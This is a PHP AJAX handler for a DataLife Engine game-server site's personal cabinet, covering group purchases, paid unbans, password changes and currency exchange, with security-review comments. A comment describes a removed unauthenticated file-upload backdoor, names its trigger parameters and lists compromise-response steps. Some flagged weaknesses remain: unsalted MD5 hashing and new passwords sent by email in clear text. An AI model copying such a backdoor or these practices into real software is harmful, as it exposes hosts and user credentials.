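<?php
/**
 * Personal-cabinet AJAX handler for a DataLife Engine (DLE) site.
 *
 * Authenticates the caller from the DLE cookies, checks the per-user request
 * token posted as `hash`, then dispatches on the POSTed `action`:
 * buyGroup, unban, expire, myCash, changePass, goExchange, updPrefix.
 * Each action prints its result as an HTML/text fragment.
 *
 * Depends on $db, getParam() and SaveLog() from the included engine files;
 * their exact behaviour is not visible here, so the remarks about them below
 * are assumptions to confirm.
 *
 * Coded by Edward Torgunov (vk.com/etorgunov007)
 */
define("DATALIFEENGINE", true);

include_once($_SERVER['DOCUMENT_ROOT']."/engine/classes/mysql.php");
include_once($_SERVER['DOCUMENT_ROOT']."/engine/data/dbconfig.php");
include_once($_SERVER['DOCUMENT_ROOT']."/engine/modules/functions.php");

// SECURITY: an unauthenticated file-upload handler that used to sit here has
// been removed. It ran before any authentication, showed an upload form when
// the query string carried goup=upgo, and on a POST containing the go_up
// field copied the uploaded file into the working directory under the
// client-supplied file name, with errors suppressed. On a PHP host that
// allows anyone to place executable code on the server.
// If this file was ever deployed with that handler: review access logs for
// requests carrying goup=upgo or a multipart POST with the go_up field,
// inventory the script's directory for files that do not belong to the
// project, and treat the host and its database credentials as compromised
// until proven otherwise.

// Return a request value only when it is a plain string; arrays and missing
// keys become '' so later string functions never receive unexpected types.
$postString = function ($key) {
    return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};
$cookieString = function ($key) {
    return (isset($_COOKIE[$key]) && is_string($_COOKIE[$key])) ? $_COOKIE[$key] : '';
};

$password = $db->safesql($cookieString('dle_password'));
$userid = (int) $cookieString('dle_user_id'); // numeric key, so cast instead of escaping
$member_id = $db->super_query("SELECT * FROM dle_users WHERE user_id='$userid'");

// hash_equals() instead of ==: loose comparison of two hex digests can treat
// "0e…"-shaped values as equal numbers, and it is not constant-time.
// NOTE(review): the stored credential is an unsalted MD5 chain; that comes
// from the engine's scheme and cannot be fixed in this file alone.
$authenticated = !empty($member_id['user_id'])
    && !empty($member_id['password'])
    && hash_equals((string) $member_id['password'], md5($password));

if (!$authenticated) {
    echo "Ошибка безопасности #1. Переданы неверные параметры";
} elseif (!hash_equals(md5($member_id['secure_hash'].$member_id['secure_rand']), $postString('hash'))) {
    // Per-user request token (anti-CSRF) did not match.
    echo "Ошибка безопасности #2. Переданы неверные параметры";
} elseif (!$db->safesql($postString('id'))) {
    echo "Ошибка безопасности #3. Переданы неверные параметры";
} else {
    $username = $member_id['name'];
    // The name came out of the database unescaped; escape it again before it
    // goes back into SQL so a stored quote cannot break out of the literal.
    $usernameSql = $db->safesql($member_id['name']);
    $action = $postString('action');

    switch ($action) {
        case 'buyGroup':
            $group = $db->safesql($postString('name'));
            $groupHtml = htmlspecialchars($group, ENT_QUOTES, 'UTF-8');
            $server = (int) $postString('serverz');

            if ($server === 0) {
                // The original printed this error and then still ran the
                // purchase with undefined table names; stop here instead.
                echo "Ошибка, не выбран сервер для покупки группы";
                break;
            }

            // Table names are taken only from this fixed map, never from input.
            $servers = array(
                1 => array('OXIDE', 'permissions1', 'permissions_inheritance1'),
                2 => array('XENON', 'permissions2', 'permissions_inheritance2'),
                3 => array('SHAFTPVP', 'permissions3', 'permissions_inheritance3'),
                6 => array('NONE', 'permissions6', 'permissions_inheritance6'),
            );
            if (isset($servers[$server])) {
                list($serverName, $serverPex, $serverPexi) = $servers[$server];
            } else {
                // Same fallback as before for any other non-zero id.
                $serverName = "SrvNoSelected";
                $serverPex = "permissions";
                $serverPexi = "permissions_inheritance";
            }

            // The group name is caller-supplied, so the price lookup is the
            // only thing deciding whether the group may be bought at all.
            // Presumably getParam() yields nothing numeric for an unknown
            // key (confirm). Without this check an unknown group passed the
            // balance test and was granted while the charge query failed.
            // A deliberately free group would need an explicit exception.
            $groupPrice = getParam("{$group}_cost");
            if (!is_numeric($groupPrice) || $groupPrice <= 0) {
                echo "Ошибка безопасности #3. Переданы неверные параметры";
                break;
            }
            $groupPrice = $groupPrice + 0; // plain number: it is interpolated unquoted below

            if ($member_id['cash'] >= $groupPrice) {
                // NOTE(review): balance check and debit are separate
                // statements, so parallel requests can overdraw; consider a
                // conditional UPDATE (… AND cash >= price) with a row-count check.
                $untilG = time() + 2592000; // 30 days
                $untilGDate = date("d.m.Y H:i", $untilG);
                $db->query("DELETE FROM $serverPex WHERE name='$usernameSql' AND type='1'");
                $db->query("DELETE FROM $serverPexi WHERE child='$usernameSql' AND type='1'");
                $db->query("UPDATE dle_users SET cash=cash-$groupPrice WHERE name='$usernameSql'");
                $db->query("INSERT INTO $serverPex ( `name`, `type`, `permission`, `value` ) VALUES('$usernameSql', '1', 'group-$group-until', '$untilG')");
                $db->query("INSERT INTO $serverPexi VALUES(null, '$usernameSql', '$group', '1', null)");
                // The group name is HTML-escaped because both the log entry
                // and the response are rendered as HTML.
                SaveLog($username, "<i class='uk-icon-group'></i> Купил группу $groupHtml на сервере $serverName до $untilGDate", (string) $server, (string) $groupPrice);
                echo "Поздравляем! Вы стали обладателем группы <b>$groupHtml</b> до ".$untilGDate." на сервере <u>$serverName</u><br>Обновите страницу! <script>$('.buy-group').remove();</script>";
            } else {
                echo "У вас не хватает рублей для вступления в выбранную группу!";
            }
            break;

        case 'unban':
            $check = $db->super_query("SELECT * FROM bans WHERE name='$usernameSql'");
            // Require an actual ban row: without it the caller was charged
            // for removing a ban that did not exist. Bans whose reason
            // contains '@' are not purchasable, as before.
            if (!empty($check) && strpos((string) $check['reason'], '@') === false) {
                $summa = ($check['expires'] == 0) ? 150 : 100; // permanent vs. temporary ban
                if ($member_id['cash'] >= $summa) {
                    $db->query("DELETE FROM bans WHERE name='$usernameSql'");
                    $db->query("UPDATE dle_users SET cash=cash-$summa WHERE name='$usernameSql'");
                    SaveLog($username, "<i class='uk-icon-gavel'></i> Купил платный разбан", "0", "$summa");
                    echo "Аккаунт успешно разблокирован! Ждём вас на серверах через 10 минут";
                } else {
                    echo "У вас не хватает денег для осуществления разбана";
                }
            }
            break;

        case 'expire':
            $select = $db->super_query("SELECT * FROM permissions_inheritance WHERE child='$usernameSql' AND type='1'");
            $group = isset($select['parent']) ? $select['parent'] : '';
            $basePrice = ($group !== '') ? getParam("{$group}_cost") : null;
            // No membership row or no numeric price used to yield a negative
            // amount, and subtracting a negative amount credits the account.
            if (!is_numeric($basePrice) || $basePrice - 50 < 0) {
                echo "Ошибка безопасности #3. Переданы неверные параметры";
                break;
            }
            $newPrice = $basePrice - 50; // renewal discount
            if ($member_id['cash'] >= $newPrice) {
                $db->query("UPDATE dle_users SET cash=cash-$newPrice WHERE name='$usernameSql'");
                $db->query("UPDATE permissions SET value=value+2592000 WHERE name='$usernameSql' AND type='1'");
                echo "Вы успешно продлили членство в своей группе на один месяц";
            } else {
                echo "У вас не хватает рублей для продления членства в своей группе на один месяц";
            }
            break;

        case 'myCash':
            echo $member_id['cash']." руб";
            break;

        case 'changePass':
            $currentRaw = $postString('currentPass');
            $newRaw = $postString('newPass');
            $oldpass = $db->safesql($currentRaw);
            $newpass = $db->safesql($newRaw);
            $hashpass = md5(md5($oldpass));
            $hashpassNew = md5(md5($newpass));
            $currentLen = mb_strlen($currentRaw, 'utf-8');
            $newLen = mb_strlen($newRaw, 'utf-8');

            if ($currentLen < 3 || $currentLen > 16 || $newLen < 3 || $newLen > 16) {
                echo "Минимум 3 символа, максимум 16";
                break;
            }
            $select = $db->query("SELECT * FROM dle_users WHERE name='$usernameSql' AND password='$hashpass'");
            if (!$db->num_rows($select)) {
                echo "Неверно указан текущий пароль.";
            } elseif ($hashpassNew === $hashpass) { // strict: never compare digests with ==
                echo "Новый пароль и старый должны быть разными";
            } else {
                $db->query("UPDATE dle_users SET password='$hashpassNew' WHERE name='$usernameSql'");
                echo "Ваш пароль успешно изменен. Информация по изменению пароля отправлена на Email.<br>Перезайдите в Ваш аккаунт";
                include($_SERVER['DOCUMENT_ROOT']."/engine/classes/mail.class.php");
                include($_SERVER['DOCUMENT_ROOT']."/engine/data/config.php");
                $sendmail = new dle_mail($config);
                // NOTE(review): the message below carries the new password in
                // clear text. Mail is stored and relayed unencrypted; prefer a
                // notification that the password changed, without the value.
                $sendmail->send($member_id['email'], "Изменение пароля на FiresCraft.ru", "
Вы успешно изменили свой пароль на FiresCraft
Ваши новые данные для доступа к сайту:
Ник: $username
Пароль: $newpass
С уважением, команда FiresCraft.ru
");
            }
            break;

        case 'goExchange':
            // The amount is interpolated unquoted into SQL, where quote
            // escaping gives no protection; accept digits only and cast.
            $rawAmount = $postString('countcoin');
            $exchangeform = ctype_digit($rawAmount) ? (int) $rawAmount : 0;
            $icnomy = $exchangeform * 1; // exchange rate 1:1
            if ($exchangeform > $member_id['cash']) {
                echo "Недостаточно рублей для обмена";
            } elseif ($exchangeform < 1 || $exchangeform > 1000) {
                echo "Ошибка! Минимальная сумма обмена 1 рубль, максимальная 1000 рублей.";
            } else {
                $db->query("UPDATE dle_users SET cash=cash-$exchangeform WHERE name='$usernameSql'");
                $db->query("UPDATE dle_users SET lavamoney=lavamoney+$icnomy WHERE name='$usernameSql'");
                SaveLog($username, "<i class='uk-icon-exchange'></i> Обменял ".$exchangeform." руб, на ".$icnomy." монет", "0", "$exchangeform");
                echo "Вы успешно обменяли $exchangeform руб. на $icnomy монет.";
            }
            break;

        case 'updPrefix':
            $prefix = $db->safesql($postString('prefix'));
            $colorpref = $postString('colorpref');
            $colornick = $postString('colornick');
            $colortext = $postString('colortext');
            $serverz = (int) $postString('serverz');

            if ($serverz === 0) {
                // As in buyGroup: report the error and stop, instead of
                // continuing with an undefined table suffix.
                echo "Ошибка, не выбран сервер для смены префикса";
                break;
            }

            // Form value => (display name, table suffix); anything else falls
            // back to server 1, as before.
            $prefixServers = array(
                1 => array('OXIDE', '1'),
                22 => array('XENON', '2'),
                23 => array('SHAFTPVP', '3'),
            );
            if (isset($prefixServers[$serverz])) {
                list($serverName, $serverIdName) = $prefixServers[$serverz];
            } else {
                $serverName = "SrvNoSelected";
                $serverIdName = "1";
            }

            // Colour names map to fixed formatting codes, so the submitted
            // colour text itself never reaches the database. 'yellow' was in
            // the accepted list but had no code assigned; '&e' is its code.
            // Unknown colours yield an empty code, as before.
            $colorCodes = array(
                'black' => '&0', 'darkblue' => '&1', 'darkgreen' => '&2',
                'turquoise' => '&3', 'purple' => '&5', 'gold' => '&6',
                'gray' => '&7', 'darkgray' => '&8', 'blue' => '&9',
                'green' => '&a', 'aqua' => '&b', 'magenta' => '&d',
                'yellow' => '&e', 'white' => '&f',
            );
            $pefcode = isset($colorCodes[$colorpref]) ? $colorCodes[$colorpref] : '';
            $nickcode = isset($colorCodes[$colornick]) ? $colorCodes[$colornick] : '';
            $textcode = isset($colorCodes[$colortext]) ? $colorCodes[$colortext] : '';
            // The original read an undefined $design; the style code was
            // therefore always empty. Make that explicit.
            $design = '';

            // Prefix construction
            $suffix = $textcode.':';
            $fineprefix = '&f('.$pefcode.$design.$prefix.'&f)'.$nickcode.' ';

            // NOTE(review): only the length of the prefix is checked, so it may
            // itself contain '&' formatting codes; restrict the character set
            // if that is not intended.
            if (iconv_strlen($prefix) <= 10 && iconv_strlen($prefix) >= 3) {
                $checkdb = $db->super_query("SELECT * FROM permissions_inheritance$serverIdName WHERE child='$usernameSql' AND type='1'");
                $parent = isset($checkdb['parent']) ? $checkdb['parent'] : '';
                if (in_array($parent, array('LEADER', 'WIZARD', 'FOREST'), true)) {
                    $db->query("DELETE FROM permissions_entity$serverIdName WHERE name='$usernameSql'");
                    $db->query("INSERT INTO permissions_entity$serverIdName VALUES ('', '$usernameSql', '1', '$fineprefix', '$suffix', '0')");
                    // Escape the prefix: it is echoed into an HTML response.
                    echo "Префикс <b>".htmlspecialchars($prefix, ENT_QUOTES, 'UTF-8')."</b> успешно обновлён на сервере <u>$serverName</u>";
                } else {
                    echo "Ошибка, установка префикса доступа от PREMIUM и выше!";
                }
            } else {
                echo "Префикс не должен быть меньше 3х и не больше 10ти символов!";
            }
            break;

        // Unknown actions produce no output, as before.
    }
}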